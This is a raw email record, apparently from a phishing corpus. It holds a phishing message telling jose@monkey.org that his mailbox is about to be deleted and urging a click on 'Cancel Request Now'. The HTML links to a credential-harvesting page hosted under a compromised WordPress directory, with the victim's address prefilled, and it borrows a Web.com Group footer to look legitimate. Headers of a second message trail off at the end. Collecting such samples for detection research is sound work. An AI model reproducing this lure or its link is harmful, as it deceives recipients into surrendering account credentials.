From: "Website Admin" <karan.chhabra@timalls.com>
Subject: Closing of your jose@monkey.org account is been processed
To: jose@monkey.org
Content-Type: multipart/alternative; boundary="y2rKggeX=_VDo1ceMsNo78UmBXm1PMpMA50"
MIME-Version: 1.0
Date: Tue, 1 Nov 2016 04:54:38 -0300
X-Antivirus: avast! (VPS 161019-0, 10/19/2016), Outbound message
X-Antivirus-Status: Clean
Status: O
X-Status: 
X-Keywords:                  
X-UID: 418

This is a multi-part message in MIME format

--y2rKggeX=_VDo1ceMsNo78UmBXm1PMpMA50
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

 - This mail is in HTML. Some elements may be ommited in plain text. -

Mailbox 90% Full
Dear

jose@monkey.org,
This message is to inform you that we received your request to delete =
your mailbox account.
We will process your request within 24 hours, All features associated =
with your account will be lost.
To retain your account, kindly cancel request to continue using our se=
rvices.
Click here to
Cancel Request Now
Kindly follow the instruction to secure your Mailbox.
Thanks
jose@monkey.org
Mail Service 2016=A9
Please do not reply to this email. Replying to this email will not sec=
ure your services. Please review our
Privacy Policy
and
Terms of Use
=2E.
2016 by Management Team, LLC.
All rights reserved. 12808 Gran Bay Parkway, West
| Jacksonville, FL 32258
Management Team is a Web.com Group, Inc. company.

--y2rKggeX=_VDo1ceMsNo78UmBXm1PMpMA50
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD>
<BODY>
<P>
<TABLE style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial, sans-serif; WORD-=
SPACING: 0px; TEXT-TRANSFORM: none; COLOR: rgb(34,34,34); ORPHANS: 2; =
WIDOWS: 2; LETTER-SPACING: normal; TEXT-INDENT: 0px; -webkit-text-stro=
ke-width: 0px" cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0>
<TBODY>
<TR>
<TD style=3D"MARGIN: 0px" bgColor=3D#e7e7e7 height=3D50 vAlign=3Dmiddl=
e align=3Dcenter><SPAN style=3D"FONT-SIZE: 22px; FONT-FAMILY: Arial, H=
elvetica, sans-serif; COLOR: rgb(0,0,0)">Mailbox 90% Full</SPAN></TD><=
/TR>
<TR>
<TD style=3D"MARGIN: 0px">
<DIV style=3D"FONT-SIZE: 13px; FONT-FAMILY: Arial, Helvetica, sans-ser=
if; PADDING-BOTTOM: 12px; PADDING-TOP: 12px; PADDING-LEFT: 12px; PADDI=
NG-RIGHT: 12px"><SPAN style=3D"FONT-FAMILY: Arial">Dear<SPAN class=3DA=
pple-converted-space>&nbsp;</SPAN><FONT color=3D#0000ff>jose@monkey.or=
g,</FONT><BR><BR>This message is to inform you that we received your r=
equest to delete your mailbox account.<BR><BR>We will process your req=
uest within 24 hours, All features associated with your account will b=
e lost.<BR><BR>To retain your account, kindly cancel request to contin=
ue using our services.<BR><BR><STRONG>Click here to&nbsp;</STRONG><SPA=
N></SPAN></SPAN><SPAN style=3D"FONT-FAMILY: Arial"><A style=3D"COLOR: =
rgb(17,85,204)" href=3D"http://mindenergycoach.com/wp-includes/css/gnz=
/index.php?username=3Djose@monkey.org" rel=3Dnoreferrer target=3D_blan=
k <a=3D""><STRONG><FONT color=3D#0000ff>Cancel Request Now</FONT></STR=
ONG></A><BR><BR>Kindly follow the instruction to secure your Mailbox.<=
BR><BR><STRONG>Thanks &nbsp;<FONT color=3D#0000ff>jose@monkey.org<BR><=
/FONT>Mail Service 2016=A9</STRONG></SPAN></DIV></TD></TR>
<TR>
<TD style=3D"FONT-SIZE: 10px; FONT-FAMILY: Verdana; COLOR: rgb(255,255=
,255); MARGIN: 0px" bgColor=3D#999999 align=3Dcenter><BR>Please do not=
 reply to this email. Replying to this email will not secure your serv=
ices. Please review our&nbsp;<A style=3D"COLOR: rgb(34,34,34)" href=3D=
"http://webmail.eleser.com/cpsess1322098061/3rdparty/roundcube/#NOP" r=
el=3Dnoreferrer>Privacy Policy</A><SPAN style=3D"WIDTH: 16px; MIN-HEIG=
HT: 16px; PADDING-RIGHT: 16px"></SPAN>and&nbsp;<A style=3D"COLOR: rgb(=
34,34,34)" href=3D"http://webmail.eleser.com/cpsess1322098061/3rdparty=
/roundcube/#NOP" rel=3Dnoreferrer>Terms of Use</A><SPAN style=3D"WIDTH=
: 16px; MIN-HEIGHT: 16px; PADDING-RIGHT: 16px"></SPAN>.<BR>2016 by Man=
agement Team, LLC.<BR>All rights reserved. 12808 Gran Bay Parkway, Wes=
t<BR>| Jacksonville, FL 32258<BR>Management Team is a Web.com Group, I=
nc. company.&nbsp;</TD></TR></TBODY></TABLE></P></BODY></HTML>

--y2rKggeX=_VDo1ceMsNo78UmBXm1PMpMA50--


From jose@monkey.org Tue Nov  1 09:23:36 2016 +0000
Return-Path: verification.service.center@customers.com
Delivered-To: jose@monkey.org
X-FDA: 72133634832.08.cover56_1f65bede58721
X-Spam-Summary: 20,1.5,0,7124dcb9f2c7ebb4,d41d8cd98f00b204,verification.service.center@customers.com,:,RULES_HIT:1:2:41:72:196:355:379:455:871:967:969:973:983:988:989:1000:1001:1147:1208:1260:1263:1308:1309:1313:1314:1345:1381:1390:1431:1432:1433:1434:1437:1516:1517:1545:1571:1573:1575:1594:1606:1622:1685:1699:1714:1730:1744:1747:1777:1792:1801:1803:2194:2198:2199:2200:2393:2525:2538:2568:2610:2628:2682:2685:2741:2859:2890:2891:2915:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3350:3421:3552:3585:3586:3867:3868:3870:3871:3873:3874:3889:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4321:4361:4503:4508:4605:5012:6238:6239:6261:6354:6506:6669:6678:6703:6741:6747:7208:7281:7774:7909:8516:8599:8603:8957:9025:9072:9074:9108:9121:9149:9388:10009:10049:10305:10346:11657:11658:11788:11914:12043:12217:12295:12324:12438:12555:12679:12718:12737:12776:12986:13132:13139:13227:13229:13231:13439:14094:14096:14106:14651:14659:14829:21067:21080:21433:21450:2
X-HE-Tag: cover56_1f65bede58721
X-Filterd-Recvd-Size: 11703
Received: from customers.com (162-17-72-162-static.hfc.comcastbusiness.net [162.17.72.162])
	by imf30.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue,  1 Nov 2016 09:23:35 +0000 (UTC)
